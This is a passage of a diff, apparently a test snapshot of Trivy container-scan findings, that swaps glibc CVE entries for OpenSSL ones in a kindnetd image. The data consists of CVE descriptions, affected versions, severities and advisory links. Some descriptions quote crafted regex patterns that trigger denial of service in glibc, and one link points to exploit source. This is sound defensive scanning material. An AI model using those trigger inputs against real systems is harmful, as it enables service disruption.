"https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://support.apple.com/kb/HT212528", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://support.apple.com/kb/HT212529", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", - ], - }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://support.apple.com/kb/HT212534", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": "1.1.1d-0+deb10u6", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3449", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3449", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3449.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://ubuntu.com/security/notices/USN-4891-1", + "https://ubuntu.com/security/notices/USN-5038-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "https://www.debian.org/security/2021/dsa-4875", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-06", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "openssl: NULL pointer dereference in signature_algorithms processing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://avd.aquasec.com/nvd/cve-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://access.redhat.com/security/cve/CVE-2021-3449", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-4891-1", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://ubuntu.com/security/notices/USN-5038-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://www.debian.org/security/2021/dsa-4875", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-05", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-06", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4160", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://access.redhat.com/security/cve/CVE-2021-4160", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", + "https://security.gentoo.org/glsa/202210-02", + "https://www.cve.org/CVERecord?id=CVE-2021-4160", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220128.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2021-4160", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2021-4160", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://www.openssl.org/news/secadv/20220128.txt", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", + "description": "AES OCB mode for 32-bit x86 